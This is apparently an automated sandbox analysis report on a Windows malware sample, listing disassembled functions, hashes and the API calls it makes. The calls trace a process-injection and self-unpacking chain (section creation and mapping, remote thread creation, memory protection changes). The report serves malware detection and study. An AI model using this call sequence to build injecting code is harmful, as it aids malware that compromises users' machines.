                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 332 520e0f-520e24 SetErrorMode * 2 333 520e26 332->333 334 520e2b-520e2c 332->334 333->334
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: a764e639832798b8d740d17924903a9f0c649362d611a0acc80e9a5e0a88a39a
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: 75D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DD90C1C770994046E5
                                                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                        Function 005BF553 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 444 5bf553-5bf58d call 5bf866 447 5bf5db 444->447 448 5bf58f-5bf5c2 VirtualAlloc call 5bf5e0 444->448 447->447 450 5bf5c7-5bf5d9 448->450 450->447
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005BF5A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: c81399c4d0b82392261faedf3bf2c20f23df24a0a6ab6db2b57ea154ffcf0f14
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: EE112B79A00208EFDB01DF98C989E98BFF5AF08750F0580A4F9489B362D771EA50DB90
                                                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1885482327-0
                                                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                        Non-executed Functions

                                                                                                        Function 0052092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                        • API String ID: 0-2784972518
                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                        • Instruction ID: 68369359295f17e5ff9a65917e847dcbda5c0b0d64a202c2997f0c44be603e7e
                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                        • Instruction Fuzzy Hash: 6931ADB2901219CFDB10CF88D880AAEBBF5FF49324F24504AD401A7392C370EA85CFA4
                                                                                                        Function 005BF171 Relevance: .1, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                        • Instruction ID: 2bc78050264947433b0369b86a53f78e783cfa48db76fce7e65d11ee7e7818d7
                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                        • Instruction Fuzzy Hash: 58117972340100EFDB54DE59DC91EE677EAFB88320B298465ED09CB316E675EC02C760
                                                                                                        Function 00403277 Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                                        Function 00520D90 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                        • Instruction ID: f28657fdea962ab7d7c068d02efbe15b077ffee6a47d8b9873907585d2d5aae2
                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                        • Instruction Fuzzy Hash: DB01F7766026108FDF21DF60E804BAB37F9FF87305F0544A4D506972C3E370A8418B80
                                                                                                        Function 0040324F Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                                        Function 00403256 Relevance: .0, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                                        Function 00403247 Relevance: .0, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                                        Function 0040326C Relevance: .0, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                                        Function 00403290 Relevance: .0, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.7%
                                                                                                        Dynamic/Decrypted Code Coverage:40.7%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:118
                                                                                                        Total number of Limit Nodes:4
                                                                                                        execution_graph 3251 402e40 3253 402e37 3251->3253 3254 402edf 3253->3254 3255 4018e6 3253->3255 3256 4018f5 3255->3256 3257 40192e Sleep 3256->3257 3258 401949 3257->3258 3260 40195a 3258->3260 3261 401514 3258->3261 3260->3254 3262 401524 3261->3262 3263 4015c4 NtDuplicateObject 3262->3263 3272 4016e0 3262->3272 3264 4015e1 NtCreateSection 3263->3264 3263->3272 3265 401661 NtCreateSection 3264->3265 3266 401607 NtMapViewOfSection 3264->3266 3267 40168d 3265->3267 3265->3272 3266->3265 3268 40162a NtMapViewOfSection 3266->3268 3269 401697 NtMapViewOfSection 3267->3269 3267->3272 3268->3265 3270 401648 3268->3270 3271 4016be NtMapViewOfSection 3269->3271 3269->3272 3270->3265 3271->3272 3272->3260 3368 401542 3369 40153b 3368->3369 3370 4015c4 NtDuplicateObject 3369->3370 3379 4016e0 3369->3379 3371 4015e1 NtCreateSection 3370->3371 3370->3379 3372 401661 NtCreateSection 3371->3372 3373 401607 NtMapViewOfSection 3371->3373 3374 40168d 3372->3374 3372->3379 3373->3372 3375 40162a NtMapViewOfSection 3373->3375 3376 401697 NtMapViewOfSection 3374->3376 3374->3379 3375->3372 3377 401648 3375->3377 3378 4016be NtMapViewOfSection 3376->3378 3376->3379 3377->3372 3378->3379 3311 4a0001 3312 4a0005 3311->3312 3317 4a092b GetPEB 3312->3317 3314 4a0030 3319 4a003c 3314->3319 3318 4a0972 3317->3318 3318->3314 3320 4a0049 3319->3320 3321 4a0e0f 2 API calls 3320->3321 3322 4a0223 3321->3322 3323 4a0d90 GetPEB 3322->3323 3324 4a0238 VirtualAlloc 3323->3324 3325 4a0265 3324->3325 3326 4a02ce VirtualProtect 3325->3326 3328 4a030b 3326->3328 3327 4a0439 VirtualFree 3331 4a04be LoadLibraryA 3327->3331 3328->3327 3330 4a08c7 3331->3330 3332 4a0005 3333 4a092b GetPEB 3332->3333 3334 4a0030 3333->3334 3335 4a003c 7 API calls 3334->3335 3336 4a0038 3335->3336 3427 402dd0 3428 402ddc 3427->3428 3429 4018e6 8 API calls 3428->3429 3430 402edf 3428->3430 3429->3430 3349 4018f1 3350 4018f6 3349->3350 3351 40192e Sleep 3350->3351 3352 401949 3351->3352 3353 401514 7 API calls 3352->3353 3354 40195a 3352->3354 3353->3354 3414 401915 3415 4018c6 3414->3415 3416 40191a 3414->3416 3417 40192e Sleep 3416->3417 3418 401949 3417->3418 3419 401514 7 API calls 3418->3419 3420 40195a 3418->3420 3419->3420 3273 4a003c 3274 4a0049 3273->3274 3286 4a0e0f SetErrorMode SetErrorMode 3274->3286 3279 4a0265 3280 4a02ce VirtualProtect 3279->3280 3282 4a030b 3280->3282 3281 4a0439 VirtualFree 3285 4a04be LoadLibraryA 3281->3285 3282->3281 3284 4a08c7 3285->3284 3287 4a0223 3286->3287 3288 4a0d90 3287->3288 3289 4a0dad 3288->3289 3290 4a0dbb GetPEB 3289->3290 3291 4a0238 VirtualAlloc 3289->3291 3290->3291 3291->3279 3292 402f97 3293 4030ee 3292->3293 3294 402fc1 3292->3294 3294->3293 3295 40307c RtlCreateUserThread NtTerminateProcess 3294->3295 3295->3293 3404 402d7b 3407 402d38 3404->3407 3405 402dc7 3406 4018e6 8 API calls 3406->3405 3407->3404 3407->3405 3407->3406 3296 51e3ec 3297 51e3fb 3296->3297 3300 51eb8c 3297->3300 3303 51eba7 3300->3303 3301 51ebb0 CreateToolhelp32Snapshot 3302 51ebcc Module32First 3301->3302 3301->3303 3304 51e404 3302->3304 3305 51ebdb 3302->3305 3303->3301 3303->3302 3307 51e84b 3305->3307 3308 51e876 3307->3308 3309 51e887 VirtualAlloc 3308->3309 3310 51e8bf 3308->3310 3309->3310 3355 4014fe 3356 401531 3355->3356 3357 401506 3355->3357 3358 4015c4 NtDuplicateObject 3356->3358 3367 4016e0 3356->3367 3359 4015e1 NtCreateSection 3358->3359 3358->3367 3360 401661 NtCreateSection 3359->3360 3361 401607 NtMapViewOfSection 3359->3361 3362 40168d 3360->3362 3360->3367 3361->3360 3363 40162a NtMapViewOfSection 3361->3363 3364 401697 NtMapViewOfSection 3362->3364 3362->3367 3363->3360 3365 401648 3363->3365 3366 4016be NtMapViewOfSection 3364->3366 3364->3367 3365->3360 3366->3367

                                                                                                        Executed Functions

                                                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 112 4018c5 104->112 113 4018bc-4018e3 call 401193 104->113 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 112->113 114->106 117 4015e1-401605 NtCreateSection 114->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->106 121 40168d-401691 119->121 120->119 123 40162a-401646 NtMapViewOfSection 120->123 121->106 124 401697-4016b8 NtMapViewOfSection 121->124 123->119 126 401648-40165e 123->126 124->106 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->106 130 4016e0 call 4016e5 127->130
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
